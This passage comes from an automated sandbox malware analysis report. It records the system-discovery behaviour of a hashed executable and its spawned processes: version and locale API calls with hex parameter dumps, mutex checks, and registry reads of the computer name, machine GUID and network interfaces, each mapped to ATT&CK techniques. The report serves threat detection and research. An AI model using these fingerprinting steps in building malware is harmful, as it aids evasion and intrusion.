940000000600000001000000b11d00000200000053657276696365205061636b20310000636d886a00005600000000006c6d886ad5ed3162d8d77a65c4f52c00c0f52c0000000000000000000000000000000000d8d77a6518f52c000000000088f52c00c4f52c0058f52c00ff23886ac83b916a98f52c003117886a080000001c5cb37714a1b477ffffffff2400000080f52c00 (UID: 00000000-00006136)\n \"host.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006136)\n \"host.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000010000006f001400000060a43a00000000000100000001000000000000002c000000400b3c0000000000140000000a000000000000000000000000007200d0ab3b00140000000000000000000000f0613b0000000000000000000000000000aa3b00000000000c00000c (UID: 00000000-00006136)\n \"host.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb157738c13f0000f0fd7f9a5cb57700e0fd7fa8bd2c0044f0fd7f00000000400000003f0000002200000000f0fd7f9cbd2c00c15cb5776082bc772200000000f0fd7f9a5cb57700e0fd7fc0bd2c005789b4778083bc771317b175d8eb1577 (UID: 00000000-00006136)\n \"host.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006136)\n \"GameSDK.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c0de1f00ecf44100145cb477435cb477b8f541000100000094011d00010000006cf44100935cb5774083bc77d4a0b4771429ed77b8f54100010000000100000010be1f00000000003cf441006cf44100d8f4410095e1b07780d91800feffffffd4a0b4771bbeb0750000627700000000 (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100005300780053005c007800380036005f006d006900630072006f0073006f00660074002e0076006300380030002e006300720074005f0031006600630038006200330062003900610031006500310038006500330062005f0038002e0030002e00350030003700320037002e0034003900 (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000636d886a0000cf00000000006c6d886a22c80846d8d77a656cf3160068f3160000000000000000000000000000000000d8d77a65c0f216000000000030f316006cf3160000f31600ff23886ac83b916a40f316003117886a080000001c5cb37714a1b477ffffffff2400000028f31600 (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100000000000000000100000033001400000010aa1f00000000000100000001000000000000002c00000000eb200000000000140000000a000000000000000000000000002000b8e82000140000000000000000000000f86d200000000000000000000000000000aa2000000000000e00000e (UID: 00000000-00003876)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003972)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100000d7281770000af770000000092383b64d000af7702000000000000008800000095e1b07758742d00459d79770000440000000000800000000200000000002e009c1df6736c742d006c22f67380000000d322f673dcf0f67388742d00741df673dcf0f67300000000b8752d0000000000 (UID: 00000000-00003972)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb1577888c49000090fd7f9a5cb57700f0fd7f30742d004490fd7f00000000400000003f000000200000000090fd7f24742d00c15cb5776082bc77200000000090fd7f9a5cb57700f0fd7f48742d005789b4778083bc771317b175d8eb1577 (UID: 00000000-00003972)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"OpenMutexW\" with parameter \"Global\\CLR_CASOFF_MUTEX\" - (UID: 00000000-00006040)\n \"host.exe\" called \"OpenMutexW\" with parameter \"Global\\CLR_CASOFF_MUTEX\" - (UID: 00000000-00006136)\n \"GameSDK.exe\" called \"OpenMutexW\" with parameter \"Global\\CLR_CASOFF_MUTEX\" - (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"OpenMutexW\" with parameter \"Global\\.net clr networking\" - (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000a70200000000082da70200000000e100000000000000d82ca702750000004098aa0200000000f50000000000000080000000000000000000000000000000000000000000000002000002186da90200000000000000000000000000000000ff07000000000000f50000f5c400a7020100000000000000020000000c0000004098aa024098aa023b98aa0200000000000000000000a70200000001b8f492020000000040f6920295e1b07725640700feffffff435cb4775059b47794000000a00000003a98aa023898aa029400000074f69202fdfefc7500000000180000007fa8bb60 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006491306500000000649130650000000014f492029f48b177669130650000000034f49202000000006691306538f492024da3b075000000000000000034f492026491306500000000000000000400000064f492020fa3b075649130650200000000000000000000000800000064913065ffffffff0100008002000000b4f4920242a2b075e9fd0000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000712200535c00000060acaa02c400a702020026001a0000000000a70200000000086da702c8fb92020c0000003801a70200000000404aa902f869a702106ba7022061a902f06da702020000000000000048000000ccfb920248fb92022c4824650000a702000000004b482465c4f5f363010000002c8d7a6500000000c0a0aa02bba0aa020000000084fb920260177365ffffffff4b482465aa4824650000a702000000004000000090fb9202e5432465c844aa02e84824651cf5f363010000002c8d7a6500000000cb00000002000000b8fb9202a0fb7465ffffffffe8482465 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006b002000310000000000712200535c00000060acaa02c400a702020026001a0000000000a70200000000086da702c8fb92020c0000003801a70200000000404aa902f869a702106ba7022061a902f06da702020000000000000048000000ccfb920248fb92022c4824650000a702000000004b482465c4f5f3633f873065c4f5f363010000002c8d7a6500000000b0fb920264fb920228767065ffffffff3f8730655d873065fcf5f363010000002c8d7a6500000000b0fb92028cfb920228777065ffffffff5d8730657b87306514f5f363010000002c8d7a6500000000b0fb9202 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000aa0201000100e4f99202b8f99202b8f992022459b5770000000014fa92020cb74265e4f992020600000030fa92020c87b177000000000200000030fa9202626fb4773487b1773d8c217514d57a6572c6fc750000000001000100060000000000000008d57a6508f2a9020000000050de7a6500000000bacb2bccb616f34c8990d74c2e8af5003d8c2175d4f9920200000000b8fb920295e1b077b56a0700feffffff3487b177c4b6426540964265c844aa02fcb64265010000006cfa9202d9b642651cd57a6501000000c844aa02bccefc7500000000000000000000000098fb9202 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180000006fabbb60c386a46a8008920264f79202ccfb920260b4a46a5bd38f08feffffff30f792027b92a36ae0f69202fc683065fc6830659492a36a64f79202 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000007401a7020000000001000000140000005001a7021500000008b4aa0200000000150000000000000014000000000000000000000000000000000000000000000002000002186da9022100002100000000000000000000000080000000000000007c21005d489caa020100000000000000020000000c000000406fa902406fa9023b6fa90200000000000000000000a702000000019cf5920200000000b8fb920295e1b07725640700feffffff435cb4775059b47794000000a00000003a6fa902386fa9029400000040f79202fdfefc75180000001fabbb60c386a46a70089202 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000d2000000d20000000c0000006865ac0201000000020000000200000010000000d4267a6501000000383d7a650100000024f39202b4f29202de442465085cab02e4f292029f442465b844246568fcf36308bca90224f3920201000000000000000000000000f392021ce37365ffffffffb84424657d44246580fdf36308bca902b856ac02010000008a412a65c0fdf36308bca902589eab0200000000739f2965c8fdf36308bca902589eab0200000000383d7a6500000000e1a729650000000008bca902 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000ffffffff34f29202000000000000000018f2920230f29202010000000000000002000000000000000000000088f29202bb362a657801000004000000002058020000250600000000e9362a6504fcf36302000000f0f29202000000004da0b0757401000080f2920268f29202180000000500000000205802000000000020580202000000f0f292020000000094f29202b0ea2a65800025060000000000205802acf2920215ee2a6580002506000025060000000000205802ccf2920207ef2a65800025060000250600000000002058026077ac020000000030f39202e3ec2a65 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000ca000000ca0000000c000000980cad0201000000020000000200000010000000d4267a6501000000383d7a6501000000e8cc920278cc9202de442465085cab02a8cc92029f442465b844246524c2f36388c0a902e8cc9202010000000000000000000000c4cc92021ce37365ffffffffb84424657d4424655cc2f36388c0a902d88cad02010000008a412a659cc3f36388c0a902f882ad0200000000739f296584c3f36388c0a902f882ad0200000000383d7a6500000000e1a729650000000088c0a902 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360067548860f0cb92026d82f3751c44ae0204010000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000660036003300300061006400660037003600640034003600330039006100320064003100640061003000300033003100310062003200350061006400300062006300310035003100330038003400350035003900640062003800340030003800370039002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bb47795c02175d8eb1577ac01a7020000a70200000000000000000a00ca00fe020000000000000000000000000000000000000b00c500fe0200000000000000000000086da70200000000200000000000000000000000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001b5a8860ccc592026d82f375bc41b10204010000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001b5a8860ccc592026d82f375dc43b10204010000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000b102f83b0000ff0700000000a702000000007f070000c400a702d82ca7029b2200003cc5920267e5b1770000a702084bb100000000000000a70200000000084bb102000000004722006580000000b04db102c400a702b88bb002003b00000000a70200000000084bb102c01600000000a7020048b102f83b0000ff0700000000a702000000007f070000c400a7027b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001b5a8860ccc592026d82f3758445b10204010000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000b102f83b0000ff0700000000a702000000007f070000c400a702d82ca702662200003cc5920267e5b1770000a702b04cb100000000000000a70200000000b04cb102000000001222003080000000584fb102c400a702408bb002003b00000000a70200000000b04cb102c01600000000a702a849b102f83b0000ff0700000000a702000000007f070000c400a7027b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001b5a8860ccc592026d82f375b446b10204010000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000b102f83b0000ff0700000000a702000000007f070000c400a702d82ca702402200003cc5920267e5b1770000a702e04db100000000000000a70200000000e04db10200000000ec2100cd800000008850b102c400a702408bb002003b00000000a70200000000e04db102c01600000000a702d84ab102f83b0000ff0700000000a702000000007f070000c400a7027b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001b5a8860ccc592026d82f375e447b10204010000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000b102f83b0000ff0700000000a702000000007f070000c400a702d82ca7021a2200003cc5920267e5b1770000a702104fb100000000000000a70200000000104fb10200000000c62100e780000000b851b102c400a702a88bb002003b00000000a70200000000104fb102c01600000000a702084cb102f83b0000ff0700000000a702000000007f070000c400a7027b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001b5a8860ccc592026d82f3750c49b10204010000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000b102f83b0000ff0700000000a702000000007f070000c400a702d82ca702f52100003cc5920267e5b1770000a7023850b100000000000000a702000000003850b10200000000a121008080000000e052b102c400a702408bb002003b00000000a702000000003850b102c01600000000a702304db102f83b0000ff0700000000a702000000007f070000c400a7027b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001b5a8860ccc592026d82f3753c4ab10204010000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000b102f83b0000ff0700000000a702000000007f070000c400a702d82ca702cf2100003cc5920267e5b1770000a7026851b100000000000000a702000000006851b102000000007b21005a800000001054b102c400a702a88bb002003b00000000a702000000006851b102c01600000000a702604eb102f83b0000ff0700000000a702000000007f070000c400a7027b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001b5a8860ccc592026d82f3756c4bb10204010000 (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000b102f83b0000ff0700000000a702000000007f070000c400a702d82ca702a92100003cc5920267e5b1770000a7029852b100000000000000a702000000009852b1020000000055210074800000004055b102c400a702a88bb002003b00000000a702000000009852b102c01600000000a702904fb102f83b0000ff0700000000a702000000007f070000c400a7027b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001b5a8860ccc592026d82f375944cb10204010000 (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"IsWow64Process\" with parameter \"6040\" - (UID: 00000000-00006040)\n \"rundl32.exe\" called \"IsWow64Process\" with parameter \"6060\" - (UID: 00000000-00006060)\n \"Stable_Network.exe\" called \"IsWow64Process\" with parameter \"6124\" - (UID: 00000000-00006124)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"GetLocaleInfoW\" with parameter \"1024\" - (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006040)\n \"Stable_Network.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006124)\n \"host.exe\" called \"GetLocaleInfoW\" with parameter \"1024\" - (UID: 00000000-00006136)\n \"host.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006136)\n \"GameSDK.exe\" called \"GetLocaleInfoW\" with parameter \"1024\" - (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006040)\n \"host.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006136)\n \"GameSDK.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"rundl32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"Stable_Network.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"host.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"GameSDK.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"CL_Debug_Log.txt\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"rundl32.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rundl32.exe\" at 00000000-00006060-0000010C-3301353", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\RUNDL32.EXE\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\RUNDL32.EXE\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\STABLE_NETWORK.EXE\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\STABLE_NETWORK.EXE\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\HOST.EXE\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\HOST.EXE\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SYSTEM.DLL.EXE\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SYSTEM.DLL.EXE\")\n \"host.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\GAMESDK.EXE\")\n \"host.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\GAMESDK.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"rundl32.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00006060)\n \"Stable_Network.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00006124)\n \"host.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00006136)\n \"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003972)\n \"netsh.exe\" called \"LookupAccountSidW\" (UID: 00000000-00003972)\n \"netsh.exe\" called \"LookupAccountSidW\" with param Name LOCAL SERVICE (UID: 00000000-00003972)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"rundl32.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"Stable_Network.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"host.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"rundl32.exe\" (Access type: 